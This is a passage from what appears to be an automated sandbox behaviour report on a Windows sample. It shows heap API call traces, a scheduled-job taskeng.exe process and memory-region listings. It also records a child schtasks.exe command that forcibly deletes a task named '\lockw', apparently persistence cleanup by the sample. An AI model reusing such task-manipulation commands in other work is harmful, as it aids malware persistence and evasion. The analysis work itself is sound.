[0222.939] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ebb80) returned 0x18
[0222.939] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebb80 | out: hHeap=0x2d0000) returned 1
[0222.939] GetProcessHeap () returned 0x2d0000
[0222.939] GetProcessHeap () returned 0x2d0000
[0222.939] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5b70) returned 1
[0222.940] GetProcessHeap () returned 0x2d0000
[0222.940] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5b70) returned 0x20
[0222.940] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5b70 | out: hHeap=0x2d0000) returned 1
[0222.940] GetProcessHeap () returned 0x2d0000
[0222.940] GetProcessHeap () returned 0x2d0000
[0222.940] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5ba0) returned 1
[0222.940] GetProcessHeap () returned 0x2d0000
[0222.940] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5ba0) returned 0x20
[0222.941] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5ba0 | out: hHeap=0x2d0000) returned 1
[0222.941] GetProcessHeap () returned 0x2d0000
[0222.941] GetProcessHeap () returned 0x2d0000
[0222.941] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5bd0) returned 1
[0222.941] GetProcessHeap () returned 0x2d0000
[0222.941] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5bd0) returned 0x20
[0222.941] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5bd0 | out: hHeap=0x2d0000) returned 1
[0222.941] GetProcessHeap () returned 0x2d0000
[0222.941] GetProcessHeap () returned 0x2d0000
[0222.941] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5c00) returned 1
[0222.941] GetProcessHeap () returned 0x2d0000
[0222.941] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5c00) returned 0x20
[0222.942] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5c00 | out: hHeap=0x2d0000) returned 1
[0222.942] GetProcessHeap () returned 0x2d0000
[0222.942] GetProcessHeap () returned 0x2d0000
[0222.942] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebba0) returned 1
[0222.942] GetProcessHeap () returned 0x2d0000
[0222.942] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ebba0) returned 0x18
[0222.942] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebba0 | out: hHeap=0x2d0000) returned 1
[0222.942] GetProcessHeap () returned 0x2d0000
[0222.942] GetProcessHeap () returned 0x2d0000
[0222.942] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5c30) returned 1
[0222.942] GetProcessHeap () returned 0x2d0000
[0222.943] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5c30) returned 0x20
[0222.943] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5c30 | out: hHeap=0x2d0000) returned 1
[0222.943] GetProcessHeap () returned 0x2d0000
[0222.943] GetProcessHeap () returned 0x2d0000
[0222.943] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5cc0) returned 1
[0222.943] GetProcessHeap () returned 0x2d0000
[0222.943] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5cc0) returned 0x20
[0222.944] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5cc0 | out: hHeap=0x2d0000) returned 1
[0222.944] GetProcessHeap () returned 0x2d0000
[0222.944] GetProcessHeap () returned 0x2d0000
[0222.944] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5d20) returned 1
[0222.944] GetProcessHeap () returned 0x2d0000
[0222.944] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5d20) returned 0x20
[0222.944] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5d20 | out: hHeap=0x2d0000) returned 1
[0222.944] GetProcessHeap () returned 0x2d0000
[0222.944] GetProcessHeap () returned 0x2d0000
[0222.944] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5d80) returned 1
[0222.944] GetProcessHeap () returned 0x2d0000
[0222.945] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5d80) returned 0x20
[0222.945] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5d80 | out: hHeap=0x2d0000) returned 1
[0222.945] GetProcessHeap () returned 0x2d0000
[0222.945] GetProcessHeap () returned 0x2d0000
[0222.945] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5db0) returned 1
[0222.945] GetProcessHeap () returned 0x2d0000
[0222.945] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5db0) returned 0x20
[0222.946] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5db0 | out: hHeap=0x2d0000) returned 1
[0222.946] GetProcessHeap () returned 0x2d0000
[0222.946] GetProcessHeap () returned 0x2d0000
[0222.946] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ecc90) returned 1
[0222.946] GetProcessHeap () returned 0x2d0000
[0222.946] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ecc90) returned 0x20
[0222.946] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ecc90 | out: hHeap=0x2d0000) returned 1
[0222.946] GetProcessHeap () returned 0x2d0000
[0222.946] GetProcessHeap () returned 0x2d0000
[0222.946] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebbc0) returned 1
[0222.947] GetProcessHeap () returned 0x2d0000
[0222.947] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ebbc0) returned 0x18
[0222.947] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebbc0 | out: hHeap=0x2d0000) returned 1
[0222.947] GetProcessHeap () returned 0x2d0000
[0222.947] GetProcessHeap () returned 0x2d0000
[0222.947] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5cf0) returned 1
[0222.947] GetProcessHeap () returned 0x2d0000
[0222.947] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5cf0) returned 0x20
[0222.947] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5cf0 | out: hHeap=0x2d0000) returned 1
[0223.068] GetProcessHeap () returned 0x2d0000
[0223.068] GetProcessHeap () returned 0x2d0000
[0223.068] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebb40) returned 1
[0223.068] GetProcessHeap () returned 0x2d0000
[0223.068] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ebb40) returned 0x18
[0223.068] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebb40 | out: hHeap=0x2d0000) returned 1
[0223.069] exit (_Code=0)
Thread:
id = 40
os_tid = 0xd48
Process:
id = "3"
image_name = "taskeng.exe"
filename = "c:\\windows\\system32\\taskeng.exe"
page_root = "0x75343000"
os_pid = "0x384"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "created_scheduled_job"
parent_id = "2"
os_parent_pid = "0x36c"
cmd_line = "taskeng.exe {33C6C6ED-05D5-479F-9912-01F9AEE1F38B} S-1-5-21-4219442223-4223814209-3835049652-1000:Q9IATRKPRH\\kEecfMwgj:Interactive:LUA[1]"
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1131
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1132
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1133
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1134
start_va = 0x50000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 1135
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1136
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 1137
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1138
start_va = 0xff640000
end_va = 0xff6b3fff
monitored = 0
entry_point = 0xff64f44c
region_type = mapped_file
name = "taskeng.exe"
filename = "\\Windows\\System32\\taskeng.exe" (normalized: "c:\\windows\\system32\\taskeng.exe")
Region:
id = 1139
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1140
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 1141
start_va = 0x7fffffdd000
end_va = 0x7fffffdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 1142
start_va = 0x7fffffdf000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdf000"
filename = ""
Region:
id = 1143
start_va = 0xd0000
end_va = 0x2bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 1144
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1145
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1146
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1147
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1148
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1149
start_va = 0xd0000
end_va = 0x136fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1150
start_va = 0x1c0000
end_va = 0x2bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 1151
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1152
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1153
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1154
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1155
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1156
start_va = 0x7fefdf10000
end_va = 0x7fefe112fff
monitored = 0
entry_point = 0x7fefdf33330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1157
start_va = 0x7feffa60000
end_va = 0x7feffb8cfff
monitored = 0
entry_point = 0x7feffaaed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1158
start_va = 0x7feff550000
end_va = 0x7feff626fff
monitored = 0
entry_point = 0x7feff553274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1159
start_va = 0x7fefaa30000
end_va = 0x7fefaa39fff
monitored = 0
entry_point = 0x7fefaa3260c
region_type = mapped_file
name = "ktmw32.dll"
filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")
Region:
id = 1160
start_va = 0x7fefd2f0000
end_va = 0x7fefd35cfff
monitored = 0
entry_point = 0x7fefd2f1010
region_type = mapped_file
name = "wevtapi.dll"
filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")
Region:
id = 1161
start_va = 0x140000
end_va = 0x1bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000140000"
filename = ""
Region:
id = 1162
start_va = 0x2c0000
end_va = 0x3bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002c0000"
filename = ""
Region:
id = 1163
start_va = 0x140000
end_va = 0x168fff
monitored = 0
entry_point = 0x141010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1164
start_va = 0x1b0000
end_va = 0x1bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 1165
start_va = 0x3c0000
end_va = 0x547fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003c0000"
filename = ""
Region:
id = 1166
start_va = 0x140000
end_va = 0x168fff
monitored = 0
entry_point = 0x141010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1167
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1168
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1169
start_va = 0x550000
end_va = 0x6d0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000550000"
filename = ""
Region:
id = 1170
start_va = 0x6e0000
end_va = 0x1adffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006e0000"
filename = ""
Region:
id = 1171
start_va = 0x20000
end_va = 0x20fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "taskeng.exe.mui"
filename = "\\Windows\\System32\\en-US\\TaskEng.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskeng.exe.mui")
Region:
id = 1172
start_va = 0x140000
end_va = 0x140fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000140000"
filename = ""
Region:
id = 1173
start_va = 0x150000
end_va = 0x150fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 1174
start_va = 0x1ae0000
end_va = 0x1cbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ae0000"
filename = ""
Region:
id = 1175
start_va = 0x1ae0000
end_va = 0x1b5cfff
monitored = 0
entry_point = 0x1aecec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1176
start_va = 0x1c40000
end_va = 0x1cbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c40000"
filename = ""
Region:
id = 1177
start_va = 0x1ae0000
end_va = 0x1b5cfff
monitored = 0
entry_point = 0x1aecec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1178
start_va = 0x7fefd6c0000
end_va = 0x7fefd6cefff
monitored = 0
entry_point = 0x7fefd6c1010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1179
start_va = 0x7fefdef0000
end_va = 0x7fefdf0efff
monitored = 0
entry_point = 0x7fefdef60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1180
start_va = 0x1ba0000
end_va = 0x1c1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ba0000"
filename = ""
Region:
id = 1181
start_va = 0x7fffffdb000
end_va = 0x7fffffdcfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdb000"
filename = ""
Region:
id = 1182
start_va = 0x7feff870000
end_va = 0x7feff94afff
monitored = 0
entry_point = 0x7feff890760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1183
start_va = 0x7fefd0c0000
end_va = 0x7fefd0d7fff
monitored = 0
entry_point = 0x7fefd0c3b48
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1184
start_va = 0x160000
end_va = 0x1a4fff
monitored = 0
entry_point = 0x161064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1185
start_va = 0x160000
end_va = 0x1a4fff
monitored = 0
entry_point = 0x161064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1186
start_va = 0x160000
end_va = 0x1a4fff
monitored = 0
entry_point = 0x161064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1187
start_va = 0x160000
end_va = 0x1a4fff
monitored = 0
entry_point = 0x161064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1188
start_va = 0x160000
end_va = 0x1a4fff
monitored = 0
entry_point = 0x161064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1189
start_va = 0x7fefcdc0000
end_va = 0x7fefce06fff
monitored = 0
entry_point = 0x7fefcdc1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1190
start_va = 0x7feff630000
end_va = 0x7feff6a0fff
monitored = 0
entry_point = 0x7feff641e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1191
start_va = 0x1e30000
end_va = 0x1eaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e30000"
filename = ""
Region:
id = 1192
start_va = 0x7fffffd9000
end_va = 0x7fffffdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd9000"
filename = ""
Region:
id = 1193
start_va = 0x7fefd690000
end_va = 0x7fefd6b4fff
monitored = 0
entry_point = 0x7fefd699658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 1194
start_va = 0x1cc0000
end_va = 0x1dbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001cc0000"
filename = ""
Region:
id = 1195
start_va = 0x1ec0000
end_va = 0x1f3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ec0000"
filename = ""
Region:
id = 1196
start_va = 0x7fffffd7000
end_va = 0x7fffffd8fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd7000"
filename = ""
Region:
id = 1197
start_va = 0x1f40000
end_va = 0x220efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1198
start_va = 0x7fefd7b0000
end_va = 0x7fefd7c3fff
monitored = 0
entry_point = 0x7fefd7b10e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 1199
start_va = 0x1b20000
end_va = 0x1b9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001b20000"
filename = ""
Region:
id = 1200
start_va = 0x7fffffd5000
end_va = 0x7fffffd6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd5000"
filename = ""
Region:
id = 1201
start_va = 0x2310000
end_va = 0x238ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002310000"
filename = ""
Region:
id = 1202
start_va = 0x7fffffd3000
end_va = 0x7fffffd4fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd3000"
filename = ""
Region:
id = 1203
start_va = 0x160000
end_va = 0x160fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000160000"
filename = ""
Region:
id = 1204
start_va = 0x7fefde50000
end_va = 0x7fefdee8fff
monitored = 0
entry_point = 0x7fefde51c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1205
start_va = 0x7fefb280000
end_va = 0x7fefb288fff
monitored = 0
entry_point = 0x7fefb2811a0
region_type = mapped_file
name = "tschannel.dll"
filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll")
Region:
id = 1206
start_va = 0x7fefbcb0000
end_va = 0x7fefbce4fff
monitored = 0
entry_point = 0x7fefbcb1064
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 1207
start_va = 0x23a0000
end_va = 0x241ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000023a0000"
filename = ""
Region:
id = 1208
start_va = 0x7fefc120000
end_va = 0x7fefc175fff
monitored = 0
entry_point = 0x7fefc12bbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 1209
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Region:
id = 1210
start_va = 0x2420000
end_va = 0x268ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002420000"
filename = ""
Region:
id = 1211
start_va = 0x2210000
end_va = 0x22eefff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002210000"
filename = ""
Region:
id = 1212
start_va = 0x7fefbcf0000
end_va = 0x7fefbd07fff
monitored = 0
entry_point = 0x7fefbcf1130
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Thread:
id = 41
os_tid = 0x7f8
Thread:
id = 42
os_tid = 0x8a0
Thread:
id = 43
os_tid = 0xb94
Thread:
id = 44
os_tid = 0x244
Thread:
id = 45
os_tid = 0xba8
Thread:
id = 46
os_tid = 0xbb0
Thread:
id = 47
os_tid = 0x664
Thread:
id = 103
os_tid = 0xd10
Process:
id = "4"
image_name = "schtasks.exe"
filename = "c:\\windows\\system32\\schtasks.exe"
page_root = "0x110f000"
os_pid = "0x448"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "3"
os_parent_pid = "0x384"
cmd_line = "schtasks.exe /delete /tn \"\\lockw\" /f"
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1488
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1489
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1490
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1491
start_va = 0x1d0000
end_va = 0x24ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 1492
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1493
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 1494
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1495
start_va = 0xffe60000
end_va = 0xffea7fff
monitored = 1
entry_point = 0xffe8966c
region_type = mapped_file
name = "schtasks.exe"
filename = "\\Windows\\System32\\schtasks.exe" (normalized: "c:\\windows\\system32\\schtasks.exe")
Region:
id = 1496
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1497
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 1498
start_va = 0x7fffffdc000
end_va = 0x7fffffddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
